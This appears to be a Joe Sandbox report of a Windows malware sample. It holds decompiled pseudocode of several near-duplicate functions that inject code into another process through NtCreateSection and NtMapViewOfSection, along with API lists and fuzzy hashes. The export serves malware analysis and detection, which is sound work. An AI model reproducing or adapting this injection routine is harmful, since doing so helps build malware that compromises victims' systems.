									_t205 = _t203 + 4;
									_t161 = 0x2260;
									_t108 = _t161;
									_t162 = _t161 << 5;
									_t163 = _t162 + _t108;
									asm("lodsb");
									_t164 = _t163;
									asm("loop 0xffffffc8");
									_t165 = _t164 ^ 0xd2aedb1b;
									_t203 = _t205 - _t165;
									_t196 = _a8 +  *_a8;
									_t143 =  *(_t196 + 6) & 0x0000ffff;
									_push(_t196);
									_t166 = _t196;
									if(_v56 == 0) {
										_t167 = _t166 + 0xf8;
										__eflags = _t167;
									} else {
										_t167 = _t166 + 0x108;
									}
									_push(_t143);
									_t144 =  *(_t167 + 0x10);
									if(_t144 != 0) {
										memcpy( *((intOrPtr*)(_t167 + 0xc)) + _v76,  *((intOrPtr*)(_t167 + 0x14)) + _a8, _t144);
										_t203 = _t203 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t189);
									_t225 = _v56;
									if(_v56 == 0) {
										_push(_t189);
										_t170 = _t189[0xd] - _v68;
										_t199 = _t189[0x28] + _v76;
										__eflags = _t199;
										while(1) {
											__eflags =  *_t199;
											if( *_t199 == 0) {
												break;
											}
											_t180 =  *_t199;
											_t199 = _t199 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t170;
												__eflags =  *((intOrPtr*)(0 + _v76 + _t180));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t189);
										_t178 = 0;
										__eflags = 0;
										_t110 =  &_v8;
										 *_t110 = 0;
										 *((intOrPtr*)(_t132 + 0x98))(_v16, 0, 0, 0, 0, 0, _t189[0xa] + _v68, _v64, _t110, 0);
									} else {
										L55();
										_pop(_t181);
										_t178 = _t181 - 0x188d;
										 *((intOrPtr*)(_t178 + 0x18c1)) = _t178 + 0x2d60;
										L0040137F(_t132, _t178 + 0x18c1, _t178, _t189, _t225, _t178 + 0x2d60, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t178 + 0x18e6)) = _t178 + 0x2db0;
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x161c);
				_t93 =  *_t203;
				return L004012ED(_t93, _t132, 0x373, _t178, _t189, _t225);
			}

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040168F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BC
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016DF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040176F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401791

Memory Dump Source

Source File: 00000015.00000002.1147242953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_rirjijj.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 5fac0892613a86f22634b628dffdff3b5e5ae0c775b9e6e23530ba081ea501fe
Instruction ID: c1e637f4ef0a5dc8081c2cbe7263db80b5b9d5f577230ae5619d48aca56ccce2
Opcode Fuzzy Hash: 5fac0892613a86f22634b628dffdff3b5e5ae0c775b9e6e23530ba081ea501fe
Instruction Fuzzy Hash: F4515EB4900249BBEB208F95CC49FEF7BB8EF81B10F14016AF911BA2E5D7759901CB25

Uniqueness

Uniqueness Score: -1.00%

Function 004015F6 Relevance: 10.7, APIs: 7, Instructions: 169
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E004015F6(void* __ebx, void* __edi, void* __eflags) {
				intOrPtr _t89;
				void* _t92;
				intOrPtr _t93;
				struct _GUID _t100;
				struct _GUID _t102;
				PVOID* _t104;
				PVOID* _t106;
				void* _t108;
				intOrPtr* _t110;
				PVOID* _t125;
				PVOID* _t127;
				intOrPtr _t132;
				void* _t134;
				void** _t136;
				signed int _t143;
				int _t144;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				void* _t166;
				intOrPtr* _t167;
				void* _t170;
				long _t178;
				intOrPtr _t180;
				void* _t181;
				void* _t188;
				HANDLE* _t189;
				HANDLE* _t191;
				void* _t196;
				intOrPtr* _t199;
				void* _t202;
				void* _t203;
				void* _t205;
				intOrPtr* _t206;
				void* _t209;
				long _t224;

				_t206 = _t205 - 1;
				_pop(_t188);
				asm("cmpsd");
				_t134 = 0x373;
				L004012ED(0x161c, __ebx, _t134, __edi, _t188, __eflags);
				_t132 =  *((intOrPtr*)(_t203 + 8));
				_t178 = 0;
				 *((intOrPtr*)(_t203 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
				}
				while(1) {
					_t89 =  *((intOrPtr*)(_t132 + 0x48))();
					if(_t89 != 0) {
						break;
					}
					 *((intOrPtr*)(_t132 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t203 - 0x5c)) = _t89;
				_t189 = _t203 - 0x60;
				 *_t189 = _t178;
				 *((intOrPtr*)(_t132 + 0x4c))(_t89, _t189);
				_t92 =  *_t189;
				if(_t92 != 0) {
					_t136 = _t203 - 0x30;
					 *_t136 = _t92;
					_t136[1] = _t178;
					_t189 = _t203 - 0x28;
					 *((intOrPtr*)(_t132 + 0x10))(_t189, 0x18);
					 *_t189 = 0x18;
					_push(_t203 - 0x30);
					_push(_t189);
					_push(0x40);
					_push(_t203 - 0x10);
					if( *((intOrPtr*)(_t132 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, _t178, _t178, 2) == 0) {
						 *(_t203 - 8) = _t178;
						_t100 = _t203 - 0x50;
						 *(_t100 + 4) = _t178;
						 *_t100 = 0x5000;
						_t191 = _t203 - 0x54;
						if(NtCreateSection(_t191, 6, _t178, _t100, 4, 0x8000000, _t178) == 0) {
							 *_t25 =  *(_t203 - 0x50);
							_t125 = _t203 - 0x44;
							 *_t125 = _t178;
							if(NtMapViewOfSection( *_t191, 0xffffffff, _t125, _t178, _t178, _t178, _t203 - 0x38, 1, _t178, 4) == 0) {
								_t127 = _t203 - 0x3c;
								 *_t127 = _t178;
								if(NtMapViewOfSection( *_t191,  *(_t203 - 0xc), _t127, _t178, _t178, _t178, _t203 - 0x38, 1, _t178, 4) == 0) {
									_t202 =  *(_t203 - 0x44);
									 *((intOrPtr*)(_t132 + 0x20))(_t178, _t202, 0x104);
									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
									 *(_t203 - 8) =  *(_t203 - 8) + 1;
								}
							}
						}
						_t102 = _t203 - 0x50;
						 *(_t102 + 4) = _t178;
						 *_t102 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
						_t189 = _t203 - 0x58;
						if(NtCreateSection(_t189, 0xe, _t178, _t102, 0x40, 0x8000000, _t178) == 0 &&  *(_t203 - 8) != 0) {
							 *_t46 =  *(_t203 - 0x50);
							_t104 = _t203 - 0x48;
							 *_t104 = _t178;
							if(NtMapViewOfSection( *_t189, 0xffffffff, _t104, _t178, _t178, _t178, _t203 - 0x38, 1, _t178, 4) == 0) {
								_t106 = _t203 - 0x40;
								 *_t106 = _t178;
								_t224 = NtMapViewOfSection( *_t189,  *(_t203 - 0xc), _t106, _t178, _t178, _t178, _t203 - 0x38, 1, _t178, 0x20);
								if(_t224 == 0) {
									L20();
									if(_t224 == 0 && _t224 != 0) {
									}
									_t209 = _t206 + 4;
									_t161 = 0x2260;
									_t108 = _t161;
									_t162 = _t161 << 5;
									_t163 = _t162 + _t108;
									asm("lodsb");
									_t164 = _t163;
									asm("loop 0xffffffc8");
									_t165 = _t164 ^ 0xd2aedb1b;
									_t206 = _t209 - _t165;
									_t196 =  *((intOrPtr*)(_t203 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0xc))));
									_t143 =  *(_t196 + 6) & 0x0000ffff;
									_push(_t196);
									_t166 = _t196;
									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
										_t167 = _t166 + 0xf8;
										__eflags = _t167;
									} else {
										_t167 = _t166 + 0x108;
									}
									_push(_t143);
									_t144 =  *(_t167 + 0x10);
									if(_t144 != 0) {
										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t203 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t203 + 0xc)), _t144);
										_t206 = _t206 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t189);
									_t229 =  *((intOrPtr*)(_t203 - 0x34));
									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
										_push(_t189);
										_t170 = _t189[0xd] -  *(_t203 - 0x40);
										_t199 = _t189[0x28] +  *(_t203 - 0x48);
										__eflags = _t199;
										while(1) {
											__eflags =  *_t199;
											if( *_t199 == 0) {
												break;
											}
											_t180 =  *_t199;
											_t199 = _t199 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t170;
												__eflags =  *((intOrPtr*)(0 +  *(_t203 - 0x48) + _t180));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t189);
										_t178 = 0;
										__eflags = 0;
										_t110 = _t203 - 4;
										 *_t110 = 0;
										 *((intOrPtr*)(_t132 + 0x98))( *(_t203 - 0xc), 0, 0, 0, 0, 0, _t189[0xa] +  *(_t203 - 0x40),  *(_t203 - 0x3c), _t110, 0);
									} else {
										L53();
										_pop(_t181);
										_t178 = _t181 - 0x188d;
										 *((intOrPtr*)(_t178 + 0x18c1)) = _t178 + 0x2d60;
										L0040137F(_t132, _t178 + 0x18c1, _t178, _t189, _t229, _t178 + 0x2d60, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t178 + 0x18e6)) = _t178 + 0x2db0;
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x161c);
				_t93 =  *_t206;
				return L004012ED(_t93, _t132, 0x373, _t178, _t189, _t229);
			}

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040168F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BC
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016DF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040176F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401791

Memory Dump Source

Source File: 00000015.00000002.1147242953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_rirjijj.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: b73008d36a232ba2659a1168dc5dbebbb68a6854f22cdd9ba2d70834c550a8b1
Instruction ID: 5cd23dc7fdecf773fd93c991c494fcf980b85e2b00be7ae144832a4057ef90ff
Opcode Fuzzy Hash: b73008d36a232ba2659a1168dc5dbebbb68a6854f22cdd9ba2d70834c550a8b1
Instruction Fuzzy Hash: EF5127B0900249BBEB208F95CC48FEFBBB9EF85B10F140169F911BA2A5D6759940CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401600 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00401600(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t89;
				void* _t92;
				intOrPtr _t93;
				struct _GUID _t100;
				struct _GUID _t102;
				PVOID* _t104;
				PVOID* _t106;
				void* _t108;
				intOrPtr* _t110;
				PVOID* _t125;
				PVOID* _t127;
				intOrPtr _t132;
				void* _t134;
				void** _t136;
				signed int _t143;
				int _t144;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				void* _t166;
				intOrPtr* _t167;
				void* _t170;
				long _t178;
				intOrPtr _t180;
				void* _t181;
				HANDLE* _t189;
				HANDLE* _t191;
				void* _t196;
				intOrPtr* _t199;
				void* _t202;
				void* _t203;
				void* _t204;
				intOrPtr* _t206;
				void* _t209;
				long _t224;

				_t204 = _t203 - 1;
				asm("adc al, 0xeb");
				_t134 = 0x373;
				L004012ED(0x161c, __ebx, _t134, __edi, __esi, __eflags);
				_t132 =  *((intOrPtr*)(_t204 + 8));
				_t178 = 0;
				 *((intOrPtr*)(_t204 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t204 - 0x34)) =  *((intOrPtr*)(_t204 - 0x34)) + 1;
				}
				while(1) {
					_t89 =  *((intOrPtr*)(_t132 + 0x48))();
					if(_t89 != 0) {
						break;
					}
					 *((intOrPtr*)(_t132 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t204 - 0x5c)) = _t89;
				_t189 = _t204 - 0x60;
				 *_t189 = _t178;
				 *((intOrPtr*)(_t132 + 0x4c))(_t89, _t189);
				_t92 =  *_t189;
				if(_t92 != 0) {
					_t136 = _t204 - 0x30;
					 *_t136 = _t92;
					_t136[1] = _t178;
					_t189 = _t204 - 0x28;
					 *((intOrPtr*)(_t132 + 0x10))(_t189, 0x18);
					 *_t189 = 0x18;
					_push(_t204 - 0x30);
					_push(_t189);
					_push(0x40);
					_push(_t204 - 0x10);
					if( *((intOrPtr*)(_t132 + 0x70))() == 0 && NtDuplicateObject( *(_t204 - 0x10), 0xffffffff, 0xffffffff, _t204 - 0xc, _t178, _t178, 2) == 0) {
						 *(_t204 - 8) = _t178;
						_t100 = _t204 - 0x50;
						 *(_t100 + 4) = _t178;
						 *_t100 = 0x5000;
						_t191 = _t204 - 0x54;
						if(NtCreateSection(_t191, 6, _t178, _t100, 4, 0x8000000, _t178) == 0) {
							 *_t25 =  *(_t204 - 0x50);
							_t125 = _t204 - 0x44;
							 *_t125 = _t178;
							if(NtMapViewOfSection( *_t191, 0xffffffff, _t125, _t178, _t178, _t178, _t204 - 0x38, 1, _t178, 4) == 0) {
								_t127 = _t204 - 0x3c;
								 *_t127 = _t178;
								if(NtMapViewOfSection( *_t191,  *(_t204 - 0xc), _t127, _t178, _t178, _t178, _t204 - 0x38, 1, _t178, 4) == 0) {
									_t202 =  *(_t204 - 0x44);
									 *((intOrPtr*)(_t132 + 0x20))(_t178, _t202, 0x104);
									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t204 + 0x14));
									 *(_t204 - 8) =  *(_t204 - 8) + 1;
								}
							}
						}
						_t102 = _t204 - 0x50;
						 *(_t102 + 4) = _t178;
						 *_t102 =  *((intOrPtr*)(_t204 + 0x10)) + 0x10000;
						_t189 = _t204 - 0x58;
						if(NtCreateSection(_t189, 0xe, _t178, _t102, 0x40, 0x8000000, _t178) == 0 &&  *(_t204 - 8) != 0) {
							 *_t46 =  *(_t204 - 0x50);
							_t104 = _t204 - 0x48;
							 *_t104 = _t178;
							if(NtMapViewOfSection( *_t189, 0xffffffff, _t104, _t178, _t178, _t178, _t204 - 0x38, 1, _t178, 4) == 0) {
								_t106 = _t204 - 0x40;
								 *_t106 = _t178;
								_t224 = NtMapViewOfSection( *_t189,  *(_t204 - 0xc), _t106, _t178, _t178, _t178, _t204 - 0x38, 1, _t178, 0x20);
								if(_t224 == 0) {
									L21();
									if(_t224 == 0 && _t224 != 0) {
									}
									_t209 = _t206 + 4;
									_t161 = 0x2260;
									_t108 = _t161;
									_t162 = _t161 << 5;
									_t163 = _t162 + _t108;
									asm("lodsb");
									_t164 = _t163;
									asm("loop 0xffffffc8");
									_t165 = _t164 ^ 0xd2aedb1b;
									_t206 = _t209 - _t165;
									_t196 =  *((intOrPtr*)(_t204 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t204 + 0xc))));
									_t143 =  *(_t196 + 6) & 0x0000ffff;
									_push(_t196);
									_t166 = _t196;
									if( *((intOrPtr*)(_t204 - 0x34)) == 0) {
										_t167 = _t166 + 0xf8;
										__eflags = _t167;
									} else {
										_t167 = _t166 + 0x108;
									}
									_push(_t143);
									_t144 =  *(_t167 + 0x10);
									if(_t144 != 0) {
										memcpy( *((intOrPtr*)(_t167 + 0xc)) +  *(_t204 - 0x48),  *((intOrPtr*)(_t167 + 0x14)) +  *((intOrPtr*)(_t204 + 0xc)), _t144);
										_t206 = _t206 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t189);
									_t229 =  *((intOrPtr*)(_t204 - 0x34));
									if( *((intOrPtr*)(_t204 - 0x34)) == 0) {
										_push(_t189);
										_t170 = _t189[0xd] -  *(_t204 - 0x40);
										_t199 = _t189[0x28] +  *(_t204 - 0x48);
										__eflags = _t199;
										while(1) {
											__eflags =  *_t199;
											if( *_t199 == 0) {
												break;
											}
											_t180 =  *_t199;
											_t199 = _t199 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t170;
												__eflags =  *((intOrPtr*)(0 +  *(_t204 - 0x48) + _t180));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t189);
										_t178 = 0;
										__eflags = 0;
										_t110 = _t204 - 4;
										 *_t110 = 0;
										 *((intOrPtr*)(_t132 + 0x98))( *(_t204 - 0xc), 0, 0, 0, 0, 0, _t189[0xa] +  *(_t204 - 0x40),  *(_t204 - 0x3c), _t110, 0);
									} else {
										L54();
										_pop(_t181);
										_t178 = _t181 - 0x188d;
										 *((intOrPtr*)(_t178 + 0x18c1)) = _t178 + 0x2d60;
										L0040137F(_t132, _t178 + 0x18c1, _t178, _t189, _t229, _t178 + 0x2d60, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t178 + 0x18e6)) = _t178 + 0x2db0;
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x161c);
				_t93 =  *_t206;
				return L004012ED(_t93, _t132, 0x373, _t178, _t189, _t229);
			}

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040168F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BC
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016DF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040176F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401791

Memory Dump Source

Source File: 00000015.00000002.1147242953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_rirjijj.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6c838682c332385e2d885fe22b4c3d52f61e9fc607ba01145cc57c0517593a7e
Instruction ID: f2ed21f0fa72c98f368405c785c410b9b361a013cd4fbe7763913dbd5107623f
Opcode Fuzzy Hash: 6c838682c332385e2d885fe22b4c3d52f61e9fc607ba01145cc57c0517593a7e
Instruction Fuzzy Hash: 9A5128B0900249BFEB208F95CC48FEFBBB9EF85B10F100159FA11BA2A5D7749940CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401607 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E00401607(void* __ebx, void* __edi, void* __esi) {
				void* _t86;
				intOrPtr _t89;
				void* _t92;
				intOrPtr _t93;
				struct _GUID _t100;
				struct _GUID _t102;
				PVOID* _t104;
				PVOID* _t106;
				void* _t108;
				intOrPtr* _t110;
				PVOID* _t125;
				PVOID* _t127;
				intOrPtr _t132;
				void* _t135;
				void** _t137;
				signed int _t144;
				int _t145;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				void* _t167;
				intOrPtr* _t168;
				void* _t171;
				long _t179;
				intOrPtr _t181;
				void* _t182;
				HANDLE* _t190;
				HANDLE* _t192;
				void* _t197;
				intOrPtr* _t200;
				void* _t203;
				void* _t204;
				intOrPtr* _t206;
				void* _t209;
				void* _t210;
				long _t224;

				_t210 = _t206 - __edi;
				_t135 = 0x373;
				L004012ED(_t86, __ebx, _t135, __edi, __esi, _t210);
				_t132 =  *((intOrPtr*)(_t204 + 8));
				_t179 = 0;
				 *((intOrPtr*)(_t204 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t204 - 0x34)) =  *((intOrPtr*)(_t204 - 0x34)) + 1;
				}
				while(1) {
					_t89 =  *((intOrPtr*)(_t132 + 0x48))();
					if(_t89 != 0) {
						break;
					}
					 *((intOrPtr*)(_t132 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t204 - 0x5c)) = _t89;
				_t190 = _t204 - 0x60;
				 *_t190 = _t179;
				 *((intOrPtr*)(_t132 + 0x4c))(_t89, _t190);
				_t92 =  *_t190;
				if(_t92 != 0) {
					_t137 = _t204 - 0x30;
					 *_t137 = _t92;
					_t137[1] = _t179;
					_t190 = _t204 - 0x28;
					 *((intOrPtr*)(_t132 + 0x10))(_t190, 0x18);
					 *_t190 = 0x18;
					_push(_t204 - 0x30);
					_push(_t190);
					_push(0x40);
					_push(_t204 - 0x10);
					if( *((intOrPtr*)(_t132 + 0x70))() == 0 && NtDuplicateObject( *(_t204 - 0x10), 0xffffffff, 0xffffffff, _t204 - 0xc, _t179, _t179, 2) == 0) {
						 *(_t204 - 8) = _t179;
						_t100 = _t204 - 0x50;
						 *(_t100 + 4) = _t179;
						 *_t100 = 0x5000;
						_t192 = _t204 - 0x54;
						if(NtCreateSection(_t192, 6, _t179, _t100, 4, 0x8000000, _t179) == 0) {
							 *_t25 =  *(_t204 - 0x50);
							_t125 = _t204 - 0x44;
							 *_t125 = _t179;
							if(NtMapViewOfSection( *_t192, 0xffffffff, _t125, _t179, _t179, _t179, _t204 - 0x38, 1, _t179, 4) == 0) {
								_t127 = _t204 - 0x3c;
								 *_t127 = _t179;
								if(NtMapViewOfSection( *_t192,  *(_t204 - 0xc), _t127, _t179, _t179, _t179, _t204 - 0x38, 1, _t179, 4) == 0) {
									_t203 =  *(_t204 - 0x44);
									 *((intOrPtr*)(_t132 + 0x20))(_t179, _t203, 0x104);
									 *((intOrPtr*)(_t203 + 0x208)) =  *((intOrPtr*)(_t204 + 0x14));
									 *(_t204 - 8) =  *(_t204 - 8) + 1;
								}
							}
						}
						_t102 = _t204 - 0x50;
						 *(_t102 + 4) = _t179;
						 *_t102 =  *((intOrPtr*)(_t204 + 0x10)) + 0x10000;
						_t190 = _t204 - 0x58;
						if(NtCreateSection(_t190, 0xe, _t179, _t102, 0x40, 0x8000000, _t179) == 0 &&  *(_t204 - 8) != 0) {
							 *_t46 =  *(_t204 - 0x50);
							_t104 = _t204 - 0x48;
							 *_t104 = _t179;
							if(NtMapViewOfSection( *_t190, 0xffffffff, _t104, _t179, _t179, _t179, _t204 - 0x38, 1, _t179, 4) == 0) {
								_t106 = _t204 - 0x40;
								 *_t106 = _t179;
								_t224 = NtMapViewOfSection( *_t190,  *(_t204 - 0xc), _t106, _t179, _t179, _t179, _t204 - 0x38, 1, _t179, 0x20);
								if(_t224 == 0) {
									L17();
									if(_t224 == 0 && _t224 != 0) {
									}
									_t209 = _t206 + 4;
									_t162 = 0x2260;
									_t108 = _t162;
									_t163 = _t162 << 5;
									_t164 = _t163 + _t108;
									asm("lodsb");
									_t165 = _t164;
									asm("loop 0xffffffc8");
									_t166 = _t165 ^ 0xd2aedb1b;
									_t206 = _t209 - _t166;
									_t197 =  *((intOrPtr*)(_t204 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t204 + 0xc))));
									_t144 =  *(_t197 + 6) & 0x0000ffff;
									_push(_t197);
									_t167 = _t197;
									if( *((intOrPtr*)(_t204 - 0x34)) == 0) {
										_t168 = _t167 + 0xf8;
										__eflags = _t168;
									} else {
										_t168 = _t167 + 0x108;
									}
									_push(_t144);
									_t145 =  *(_t168 + 0x10);
									if(_t145 != 0) {
										memcpy( *((intOrPtr*)(_t168 + 0xc)) +  *(_t204 - 0x48),  *((intOrPtr*)(_t168 + 0x14)) +  *((intOrPtr*)(_t204 + 0xc)), _t145);
										_t206 = _t206 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t190);
									_t229 =  *((intOrPtr*)(_t204 - 0x34));
									if( *((intOrPtr*)(_t204 - 0x34)) == 0) {
										_push(_t190);
										_t171 = _t190[0xd] -  *(_t204 - 0x40);
										_t200 = _t190[0x28] +  *(_t204 - 0x48);
										__eflags = _t200;
										while(1) {
											__eflags =  *_t200;
											if( *_t200 == 0) {
												break;
											}
											_t181 =  *_t200;
											_t200 = _t200 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t171;
												__eflags =  *((intOrPtr*)(0 +  *(_t204 - 0x48) + _t181));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t190);
										_t179 = 0;
										__eflags = 0;
										_t110 = _t204 - 4;
										 *_t110 = 0;
										 *((intOrPtr*)(_t132 + 0x98))( *(_t204 - 0xc), 0, 0, 0, 0, 0, _t190[0xa] +  *(_t204 - 0x40),  *(_t204 - 0x3c), _t110, 0);
									} else {
										L50();
										_pop(_t182);
										_t179 = _t182 - 0x188d;
										 *((intOrPtr*)(_t179 + 0x18c1)) = _t179 + 0x2d60;
										L0040137F(_t132, _t179 + 0x18c1, _t179, _t190, _t229, _t179 + 0x2d60, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t179 + 0x18e6)) = _t179 + 0x2db0;
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x161c);
				_t93 =  *_t206;
				return L004012ED(_t93, _t132, 0x373, _t179, _t190, _t229);
			}

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040168F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BC
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016DF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040176F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401791

Memory Dump Source

Source File: 00000015.00000002.1147242953.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_rirjijj.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 80b731fc2edb4b7b72096c09a5d354738684f91daa03b12009c4e5a7791ba310
Instruction ID: 389d51b188f74b11e37e0c95971e7d00c02ee0a6546981c5445d81efbbdfed72
Opcode Fuzzy Hash: 80b731fc2edb4b7b72096c09a5d354738684f91daa03b12009c4e5a7791ba310
Instruction Fuzzy Hash: 9F51F8B5900249BFEF208F95CC49FEFBBB9EF85B10F100159FA11BA2A5D6749944CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401996 Relevance: 1.3, APIs: 1, Instructions: 53
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E00401996(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				void* _t16;
				intOrPtr* _t17;
				void* _t18;
				void* _t20;
				void* _t21;
				intOrPtr* _t22;
				intOrPtr* _t23;

				_t25 = __eflags;
				_push(0x19cf);
				_t8 =  *_t22;
				_t23 = _t22 + 4;
				_t18 = 0x61;
				L004012ED(_t8, _t16, _t18, _t20, _t21, __eflags);
				_t17 = _a4;
				Sleep(0x1388);
				_push( &_v8);
				_push(_a12);
				_t11 = L00401522( &_v8, _t17, _t25, _t17, _a8); // executed
				_t26 = _t11;
				if(_t11 != 0) {
					E004015EB(_t26, _t17, _t11, _v8, _a16); // executed
				}
				 *_t17(0xffffffff, 0);
				_push(0x19cf);
				_t13 =  *_t23;
				return L004012ED(_t13, _t17, 0x61, _t20, _t21, _t26);
			}

APIs

